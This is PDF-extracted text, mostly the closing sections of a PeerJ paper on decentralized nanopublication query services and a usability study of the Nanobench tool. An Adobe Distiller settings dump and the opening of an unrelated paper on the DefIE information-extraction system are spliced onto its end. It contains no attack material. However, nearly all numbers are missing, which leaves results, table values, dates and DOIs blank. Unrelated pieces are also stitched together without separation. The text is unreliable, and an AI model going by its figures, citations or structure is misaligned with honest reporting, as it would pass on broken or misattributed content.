mentioning a given orcid identifier; ( – ) of the form find_signed_nanopubs_* are given the same parameters as ( – ); ( ) get_all_indexes and ( ) get_all_users do not need parameters; ( ) get_backlinks and ( ) get_deep_backlinks are given the uri of a specific nanopublication, which has a substantial number of backlinks; ( ) get_latest_version is given the uri of the first version of a template kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nanopublication that has afterwards been updated four times; and ( ) get_nanopub_count is, like ( ), restricted to the month - . we can run these queries via the grlc-powered api but we can also use an ldf engine like comunica to run them against our ldf-based services. the latter comes with some caveats, as the free text queries of find_nanopubs_with_text and find_signed_nanopubs_with_text depend on implementation-dependent non-standard extensions of sparql that do not work with ldf-style query execution. moreover, comunica currently lacks support for complex property paths, which are needed for get_deep_backlinks and get_latest_version. queries ( ), ( ), ( ), and ( ) can therefore only be run on the grlc-based services but not on the ldf-based ones. however, the power of the ldf-based services is of course that they can (potentially) run arbitrary sparql queries (with some restrictions, as mentioned above). to demonstrate and test this ability, we created another query ( ) that in a simple way combines the outputs of two of the currently available templates. specifically, it checks for a given user (below abbreviated as me:) who he has declared to know via the foaf:knows template, and then searches for papers these people declared to have read via a different template. thereby, query ( ) returns a list of all papers that friends of the user me: have read: select ?person ?paper where { me: foaf:knows ?person . ?person pc:hasread ?paper . } this query can be considered a quick-and-dirty solution for exploration purposes, as it misses a number of checks. it does not check that both triples are in the assertion graphs of signed nanopublications, that the first is signed with the public key corresponding to the user in subject position, and that neither of the nanopublications is superseded or retracted. we therefore define query ( ) that includes all these checks. this query is more complicated, and we show here for illustration just the sparql fragment of the part necessary to check that the second nanopublication ?np with public key ?pubkey was not retracted: filter not exists { graph npa:graph { ?retraction npa:hasheadgraph ?rh . ?retraction npa:hasvalidsignatureforpublickey ?pubkey . } graph ?rh { ?retraction np:hasassertion ?ra . } graph ?ra { ?somebody npx:retracts ?np . } } the inconvenience of writing such rather complicated queries can be addressed by future versions of the services, which could include predefined options to restrict the query to the assertion graphs and to up-to-date content. the full set of used kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ queries and further details can be found in the supplemental material online (doi . /zenodo. ). to evaluate the performance of the nanopublication services, we accessed them in a clearly defined setting from a number of different locations from personal computers via home networks, by running the queries specified above on all service instances of both kinds. for that, we created a docker image that accesses the grlc-based services with simple http requests via curl and the ldf-based ones with the comunica (https://github.com/comunica/comunica) engine . . . the results as well as the execution time of all the calls are recorded, which is then used to evaluate the performance. for both kinds of services, the timeout is set to s. performance evaluation results we ran the dockerized evaluation process described above at five places in four different countries. each of them ran all of the compatible queries on each of the six existing service instance for both of the two kinds. for each query we therefore have outcomes for grlc and another outcomes for ldf. these outcomes fall into the general categories of timeout, error, and full result. in the case of the ldf-based services, timeout and error outcomes can come with partial results. figure shows a summary of these overall outcomes. with grlc, % of the calls succeeded and only % resulted in an error (mostly due to downtime of one particular service). with ldf, % fully succeeded, % reached the timeout, and % gave an error. the latter two sometimes gave partial results: overall % reached a timeout while still giving partial results, and overall % gave an error with a partial result. for ldf, these types of outcomes are not evenly distributed. two queries— find_nanopubs_with_uri ( ) and get_all_indexes ( )—never fully succeeded, but the former sometimes gave partial results. for the remaining queries, however, these ldf calls returned at least a partial result in % of the cases. except for query ( ) in addition to the above mentioned ( ) and ( ), the full result was always received from at least one of the servers in ldf mode. for grlc, this was the case for all queries. . . . . grlc timeout without result timeout with partial result error without result error with partial result full result _papers_x _papers _get_nanopub_count _get_latest_version _get_deep_backlinks _get_backlinks _get_all_users _get_all_indexes _find_signed_nanopubs_with_uri _find_signed_nanopubs_with_text _find_signed_nanopubs_with_pattern _find_signed_nanopubs _find_nanopubs_with_uri _find_nanopubs_with_text _find_nanopubs_with_pattern _find_nanopubs . . . . ldf ratio of query executions figure overall outcomes per query and kind of service, executed from five locations. full-size doi: . /peerj-cs. /fig- kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information https://doi.org/ . /zenodo. https://github.com/comunica/comunica http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a client checking multiple servers would therefore have eventually received the full result. for query ( ) in ldf mode, this was true for cases out of . next, we can look at the time performance. table shows the average execution times per query and service type, including only the calls that returned a full result. the successful queries to the grlc services took on average from . to . s. for the ldf services, these numbers range from . to . s (but they can be a bit misleading as they ignore the fact that the ldf services repeatedly hit the time limit of s). for the queries that could successfully be run on both kinds of services, ldf is on average . to . times slower than grlc. importantly, the queries that do not follow a predefined pattern ( ) and ( ) gave the full result with ldf in % of the cases and ran reasonably fast. the quick-and-dirty version ( ) required on average . s, whereas the thorough one ( ) completed on average after . s. usability evaluation now that we know that the services perform reasonably well, we wanted to find out whether this general approach and our specific nanobench tool indeed makes it easy for users who might not be experts in linked data to publish their own small data entries. usability evaluation design we wanted to test the usability of nanobench in a real setting, where users actually publish nanopublications. for that we wrote detailed instructions on how to install and use nanobench and its publication feature, which includes downloading the latest nanobench release, running it locally, accessing nanobench through their web browser, completing the nanobench profile, accessing the list of templates, and finally filling in and submitting table average execution times of the successful query executions in seconds. query grlc ldf l/g find_nanopubs . . . find_nanopubs_with_pattern . . . find_nanopubs_with_text . find_nanopubs_with_uri . find_signed_nanopubs . . . find_signed_nanopubs_with_pattern . . . find_signed_nanopubs_with_text . find_signed_nanopubs_with_uri . . . get_all_indexes . get_all_users . . . get_backlinks . . . get_deep_backlinks . get_latest_version . get_nanopub_count . . . papers . papers_x . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the publication form generated from a chosen template. through mailing lists, social media, and personal contacts, we tried to convince as many people as possible to try out nanobench and to publish some nanopublications on their own. next, we created an anonymous usability questionnaire, consisting of the ten standard questions of the widely used system usability scale (sus) (brooke, ). we added to that the questions “have you published rdf/linked data before?” and “have you digitally signed rdf/linked data before?”, and as a follow up to each of them—if the answer was “yes”—whether nanobench was harder or easier to use for publishing and signing linked data, respectively, compared to how they previously did it. the responses were on a -point likert scale from (nanobench was harder) to (nanobench was easier). we sent this questionnaire to all the nanobench users who published at least one nanopublication (not counting their introduction nanopublication), excluding the co-authors of this paper and their close relatives. further details, including instructions and questionnaire, can be found in the supplemental material online (doi . /zenodo. ). usability evaluation results overall, users registered in the decentralized system by publishing an introduction nanopublication. a total of of them ( %) also linked this introduction nanopublication from their orcid accounts, which was a step that was marked as optional. collectively, they published nanopublications, not counting their introduction nanopublications, via the use of seven distinct templates. after applying the exclusion criteria defined above, we arrived at a set of users to whom we sent the anonymous usability questionnaire (this set of users is overlapping but different from the set of users mentioned just above). after sending up to two reminders, we received responses from all of them. on the question of whether they had published linked data before, respondents ( %) said they did. of them ( %) reported that nanobench was easier to use compared to how they previously published linked data, with the remaining one being indifferent (score of ). the average was . on the -point likert scale. of the respondents, only three ( %) stated that they had previously digitally signed linked data. all three of them found nanobench easier, giving two times a and once a as responses (average . ). table shows the results of the sus questions. overall, our system achieved a sus score of . , which is clearly above the average score reported in the literature ( . ) and is roughly in the middle between “good” and “excellent” on an adjective scale (bangor, kortum & miller, ). interestingly, if we only consider the eight respondents who stated they had never published linked data before, this value is even better at . , clearly in the “excellent” range. the participants were moreover given the possibility to provide further feedback in a free-text field. we received a variety of comments for further improvement, but except for the point that the required local installation was somewhat inconvenient, no point was mentioned more than once. the other comments concerned the search page being confusing (this part of the interface was indeed not the focus of the study), the lack of kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ support for batch publishing of multiple similar nanopublications, the lack of integrated orcid lookup, the relatively small number of general-purpose templates, the lack of rdf prefix recognition, the fact that not all lengthy uris are masked with readable labels in the user interface, and the fact that the confirmation checkbox did not mention the possibility of retraction. a further comment was that a command-line interface would have been preferred in the particular context of the given participant. such a command-line interface actually exists (as part of the nanopub-java library; kuhn, ) but was not the focus of this study. discussion and conclusion the results of the performance study described above confirm that the tested kinds of queries can be efficiently answered by at least one of the two types of services, and that these two service types are indeed complementary. the grlc services run reliably and fast on the types of queries they are designed for. the ldf services can run most of these kinds of queries too, albeit in a much slower fashion, and they are reasonably fast for simple kinds of unrestricted queries. the results of the usability study indicate that our nanobench client application connecting to these services is indeed easily and efficiently usable, even for users with no prior experience in linked data publishing. in future work, we are planning to improve a number of aspects of the involved tools and methods. for example, our approach does not yet exploit the full potential of replication in our decentralized setting. existing work has shown that a client-side algorithm can enable effective load-balancing over tpf servers (minier et al., ), and we plan to extend this work to qpf. as another example, our otherwise decentralized approach currently uses centralized orcid identifiers. we are therefore investigating decentralized forms of authentication, such as webid-oidc (https://github.com/solid/ webid-oidc-spec) or an approach similar to the web of trust (caronni, ), where public table sus usability evaluation results. better → sus questions: odd questions: even questions: score : i think that i would like to use this system frequently . : i found the system unnecessarily complex. . : i thought the system was easy to use . : i think that i would need the support of a technical person to be able to use this system . : i found the various functions in this system were well integrated . : i thought there was too much inconsistency in this system . : i would imagine that most people would learn to use this system very quickly . : i found the system very cumbersome to use. . : i felt very confident using the system . : i needed to learn a lot of things before i could get going with this system . total: . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/solid/webid-oidc-spec https://github.com/solid/webid-oidc-spec http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ keys are found based on personal trust relationships that could themselves be published as nanopublications. such a web of trust could then also allow users in the future to find trustworthy services. this could include meta services whose task is to monitor and test other kinds of services, so clients could make an informed decision on which service instances to rely on. this is currently difficult, as there is no guarantee that all services are well-behaved and return complete and correct results. clients could already now deal with this by taking random samples of nanopublications from the publishing servers and check whether the query services correctly return them, but this is quite resource intensive. another issue that needs to be taken care of in future work is identity management when private keys are compromised, lost, or simply replaced as a measure of precaution. for that, we envisage that introduction nanopublications are extended so users can also list old public keys. on top of that, we are going to need a method for users to re-claim old nanopublications they signed with an old key that has since been compromised by a third party (possibly by linking to them with an index nanopublication signed with a new key). this will also require modifications in how we deal with retracted and superseded nanopublications, as they might then be signed with a different key. this is not trivial but can be dealt with within our framework, as opposed to blockchain-based solutions where identity is inseparably linked to private key access. currently, users need to install nanobench locally to ensure secure private key access and proper decentralization, but a more flexible and more powerful handling of private keys as explained above will also allow us to provide login-based public nanobench instances with their own sets of private keys, which in turn can significantly increase the ease of use of our approach. more work is also needed on the templating features to also cover the provenance and publication info graphs. we also plan to more closely align our templating vocabulary with existing rdf shape standards. moreover, we are working on making our templating approach more general and more powerful, by adding repeatable statement patterns among other features, such that we can express, for example, templates of templates and thereby allow users to create and publish their own templates directly via nanobench. the tools and applications we described above in a sense just scratch the surface of what can become possible with our general approach in the nearer future, from linked data publications of the latest scientific findings, to formally organized argumentation and automated real-time aggregations. we believe that our approach of semantic micro-contributions could in fact be the starting point of bringing linked data publishing to the masses. additional information and declarations funding ruben taelman is a postdoctoral fellow of the research foundation — flanders (fwo) ( n). support for vincent emonet and michel dumontier was provided by the biomedical data translator project funded by national institutes of health (no. ot tr - ). stian soiland-reyes was funded by bioexcel- (european kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ commission h -infraedi- - - ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: research foundation—flanders (fwo): n. national institutes of health: ot tr - . bioexcel- (european commission): h -infraedi- - - . competing interests haris antonatos is employed by scify. the authors declare that they have no competing interests. author contributions � tobias kuhn conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � ruben taelman performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � vincent emonet performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � haris antonatos performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � stian soiland-reyes performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � michel dumontier performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: supplemental data for the performance evaluation is available at zenodo: tobias kuhn, & vincent emonet. ( , august ). peta-pico/nanopub-services-eval . (version . ). zenodo. doi . /zenodo. . supplemental data for the usability evaluation is available at zenodo: tobias kuhn. ( , august ). peta-pico/nanobench-usability-eval . (version . ). zenodo. doi . /zenodo. . the code for nanobench (release nanobench- . ) is available at zenodo: tobias kuhn, & vincent emonet. ( , november ). peta-pico/nanobench: nanobench- . (version nanobench- . ). zenodo. doi . /zenodo. . the code for the nanopublication services (release nanopub-services- . ) is also available at zenodo: tobias kuhn. ( , november ). peta-pico/nanopub-services: nanopub-services- . (version nanopub-services- . ). zenodo. doi . /zenodo. . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references auer s, bizer c, kobilarov g, lehmann j, cyganiak r, ives z. . dbpedia: a nucleus for a web of open data. in: the semantic web. springer doi . / - - - - _ . bangor a, kortum pt, miller jt. . an empirical evaluation of the system usability scale. international journal of human-computer interaction ( ): – doi . / . baumeister j, reutelshoefer j, puppe f. . knowwe: a semantic wiki for knowledge engineering. applied intelligence ( ): – doi . /s - - - . berners-lee t. . linked data. available at https://www.w .org/designissues/linkeddata.html. bizer c, heath t, berners-lee t. . linked data: the story so far. in: semantic services, interoperability and web applications: emerging concepts. igi global doi . / - - - - .ch . brooke j. . sus-a quick and dirty usability scale. in: jordan pw, thomas b, weerdmeester ba, mcclelland il, eds. usability evaluation in industry. milton park: taylor & francis, – . buil-aranda c, hogan a, umbrich j, vandenbussche p-y. . sparql web-querying infrastructure: ready for action? in: the semantic web–iswc . springer doi . / - - - - _ . buyle r, taelman r, mostaert k, joris g, mannens e, verborgh r, berners-lee t. . streamlining governmental processes by putting citizens in control of their personal data. in: international conference on electronic governance and open society: challenges in eurasia. springer, – doi . / - - - - _ . caronni g. . walking the web of trust. in: wet ice . piscataway: ieee doi . /enabl. . . delva h, rojas melendez ja, colpaert p, verborgh r. . decentralized publication and consumption of transfer footpaths. first international workshop on semantics for transport : – . feigenbaum l, todd williams g, grant clark k, torres e. . sparql . protocol. rec., w c. available at https://www.w .org/tr/ /recsparql -protocol- /. ghidini c, kump b, lindstaedt s, mahbub n, pammer v, rospocher m, serafini l. . moki: the enterprise modelling wiki. in: european semantic web conference. springer, – doi . / - - - - _ . guha rv, brickley d, macbeth s. . schema. org: evolution of structured data on the web. communications of the acm ( ): – doi . / . kuhn t. . acewiki: a natural and expressive semantic wiki. in: proceedings of semantic web user interaction at chi : exploring hci challenges. ceur workshop proceedings. kuhn t. . nanopub-java: a java library for nanopublications. in: linked science: proceedings of the th workshop on linked science -best practices and the road ahead (lisc ). vol. . ceur workshop proceedings, – . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - https://www.w .org/designissues/linkeddata.html http://dx.doi.org/ . / - - - - .ch http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /enabl. . https://www.w .org/tr/ /recsparql -protocol- / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kuhn t, barbano pe, nagy ml, krauthammer m. . broadening the scope of nanopublications. in: extended semantic web conference. springer doi . / - - - - _ . kuhn t, chichester c, krauthammer m, queralt-rosinach n, verborgh r, giannakopoulos g, ngomo a-cn, viglianti r, dumontier m. . decentralized provenance-aware publishing with nanopublications. peerj computer science ( ):e doi . /peerj-cs. . kuhn t, dumontier m. . making digital artifacts on the web verifiable and reliable. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . kuhn t, dumontier m. . genuine semantic publishing. data science ( – ): – doi . /ds- . kuhn t, willighagen e, evelo c, queralt-rosinach n, centeno e, furlong li. . reliable granular references to changing linked data. in: international semantic web conference. springer doi . / - - - - _ . lanthaler m, gütl c. . hydra: a vocabulary for hypermedia-driven web apis. in: ldow . rio de janeiro, brazil, . lisena p, meroño-peñuela a, kuhn t, troncy r. . easy web api development with sparql transformer. in: international semantic web conference. cham: springer doi . / - - - - _ . mansour e, sambra av, hawke s, zereba m, capadisli s, ghanem a, aboulnaga a, berners- lee t. . a demonstration of the solid platform for social web applications. in: th international conference companion on world wide web. montréal, québec, canada, – doi . / . . meroño-peñuela a, hoekstra r. . grlc makes github taste like linked data apis. in: european semantic web conference. springer doi . / - - - - _ . minier t, skaf-molli h, molli p, vidal m-e. . intelligent clients for replicated triple pattern fragments. in: european semantic web conference. cham: springer doi . / - - - - _ . mons b, van haagen h, chichester c, den dunnen jt, van ommen g, van mulligen e, singh b, hooft r, roos m, hammond j, kiesel b, giardine b, velterop j, groth p, schultes e. . the value of data. nature genetics ( ): – doi . /ng - . schmachtenberg m, bizer c, paulheim h. . adoption of the linked data best practices in different topical domains. in: international semantic web conference. cham: springer, – doi . / - - - - _ . shotton d. . semantic publishing: the coming revolution in scientific journal publishing. learned publishing ( ): – doi . / . speicher s, arwe j, malhotra a. . linked data platform . . w c recommendation. available at https://www.w .org/tr/ldp/ (accessed february ). taelman r, steyskal s, kirrane s. . towards querying in decentralized environments with privacy-preserving aggregation. in: proceedings of the th workshop on storing, querying, and benchmarking the web of data. taelman r, van herwegen j, vander sande m, verborgh r. . comunica: a modular sparql query engine for the web. in: th international semantic web conference doi . / - - - - _ . third a, domingue j. . linkchains: exploring the space of decentralised trustworthy linked data. in: workshop on decentralizing the semantic web . ceur-ws. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /ds- http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /ng - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / https://www.w .org/tr/ldp/ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ verborgh r, vander sande m, hartig o, van herwegen j, de vocht l, de meester b, haesendonck g, colpaert p. . triple pattern fragments: a low-cost knowledge graph interface for the web. journal of web semantics - : – doi . /j.websem. . . . vrandečić d, krötzsch m. . wikidata: a free collaborative knowledgebase. communications of the acm ( ): – doi . / . werbrouck j, taelman r, verborgh r, pauwels p, beetz j, mannens e. . pattern-based access control in a decentralised collaboration environment. in: proceedings of the th linked data in architecture and construction workshop. ceur–ws. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.websem. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ semantic micro-contributions with decentralized nanopublication services introduction background approach performance evaluation usability evaluation discussion and conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice large-scale information extraction from textual definitions through deep syntactic and semantic analysis claudio delli bovi, luca telesca and roberto navigli department of computer science sapienza university of rome {dellibovi,navigli}@di.uniroma .it luca.telesca@gmail.com abstract we present defie, an approach to large- scale information extraction (ie) based on a syntactic-semantic analysis of textual defini- tions. given a large corpus of definitions we leverage syntactic dependencies to reduce data sparsity, then disambiguate the arguments and content words of the relation strings, and fi- nally exploit the resulting information to orga- nize the acquired relations hierarchically. the output of defie is a high-quality knowledge base consisting of several million automati- cally acquired semantic relations. introduction the problem of knowledge acquisition lies at the core of natural language processing. recent years have witnessed the massive exploitation of collabo- rative, semi-structured information as the ideal mid- dle ground between high-quality, fully-structured resources and the larger amount of cheaper (but noisy) unstructured text (hovy et al., ). col- laborative projects, like freebase (bollacker et al., ) and wikidata (vrandečić, ), have been being developed for many years and are continu- ously being improved. a great deal of research also focuses on enriching available semi-structured re- sources, most notably wikipedia, thereby creating taxonomies (ponzetto and strube, ; flati et al., ), ontologies (mahdisoltani et al., ) and se- mantic networks (navigli and ponzetto, ; nas- tase and strube, ). these solutions, however, http://lcl.uniroma .it/defie are inherently constrained to small and often pre- specified sets of relations. a more radical approach is adopted in systems like textrunner (etzioni et al., ) and reverb (fader et al., ), which developed from the open information extraction (oie) paradigm (etzioni et al., ) and focused on the unconstrained extraction of a large number of relations from massive unstructured corpora. ul- timately, all these endeavors were geared towards addressing the knowledge acquisition problem and tackling long-standing challenges in the field, such as machine reading (mitchell, ). while earlier oie approaches relied mostly on dependencies at the level of surface text (etzioni et al., ; fader et al., ), more recent work has focused on deeper language understanding at the level of both syntax and semantics (nakashole et al., ; moro and navigli, ) and tackled chal- lenging linguistic phenomena like synonymy and polysemy. however, these issues have not yet been addressed in their entirety. relation strings are still bound to surface text, lacking actual semantic con- tent. furthermore, most oie systems do not have a clear and unified ontological structure and re- quire additional processing steps, such as statisti- cal inference mappings (dutta et al., ), graph- based alignments of relational phrases (grycner and weikum, ), or knowledge base unification pro- cedures (delli bovi et al., ), in order for their potential to be exploitable in real applications. in defie the key idea is to leverage the linguistic analysis of recent semantically-enhanced oie tech- niques while moving from open text to smaller cor- pora of dense prescriptive knowledge. the aim is transactions of the association for computational linguistics, vol. , pp. – , . action editor: sebastian riedel. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. figure : syntactic-semantic graph construction from a textual definition then to extract as much information as possible by unifying syntactic analysis and state-of-the-art dis- ambiguation and entity linking. using this strategy, from an input corpus of textual definitions (short and concise descriptions of a given concept or entity) we are able to harvest fully disambiguated relation in- stances on a large scale, and integrate them auto- matically into a high-quality taxonomy of seman- tic relations. as a result a large knowledge base is produced that shows competitive accuracy and cov- erage against state-of-the-art oie systems based on much larger corpora. our contributions can be sum- marized as follows: • we propose an approach to ie that ties together syntactic dependencies and unified entity link- ing/word sense disambiguation, designed to discover semantic relations from a relatively small corpus of textual definitions; • we create a large knowledge base of fully disambiguated relation instances, ranging over named entities and concepts from available re- sources like wordnet and wikipedia; • we exploit our semantified relation patterns to automatically build a rich, high-quality relation taxonomy, showing competitive results against state-of-the-art approaches. our approach comprises three stages. first, we extract from our input corpus an initial set of seman- tic relations (section ); each relation is then scored and augmented with semantic type signatures (sec- tion ); finally, the augmented relations are used to build a relation taxonomy (section ). relation extraction here we describe the first stage of our approach, where a set of semantic relations is extracted from the input corpus. in the following, we refer to a re- lation instance as a triple t = 〈ai, r, aj〉 with ai and aj being the arguments and r the relation pattern. from each relation pattern rk the associated relation rk is identified by the set of all relation instances where r = rk. in order to extract a large set of fully disambiguated relation instances we bring together syntactic and semantic analysis on a corpus of plain textual definitions. each definition is first parsed and disambiguated (figure a-b, section . ); syntactic and semantic information is combined into a struc- tured graph representation (figure c, section . ) and relation patterns are then extracted as shortest paths between concept pairs (section . ). the semantics of our relations draws on babelnet (navigli and ponzetto, ), a wide-coverage mul- tilingual semantic network obtained from the auto- matic integration of wordnet, wikipedia and other resources. this choice is not mandatory; however, inasmuch as it is a superset of these resources, ba- belnet brings together lexicographic and encyclope- dic knowledge, enabling us to reach higher coverage while still being able to accommodate different dis- ambiguation strategies. for each relation instance t extracted, both ai,aj and the content words appear- ing in r are linked to the babelnet inventory. in the remainder of the paper we identify babelnet con- cepts or entities using a subscript-superscript nota- tion where, for instance, bandibn refers to the i-th babelnet sense for the english word band. . textual definition processing the first step of the process is the automatic extraction of syntactic information (typed depen- dencies) and semantic information (word senses and named entity mentions) from each textual definition. each definition 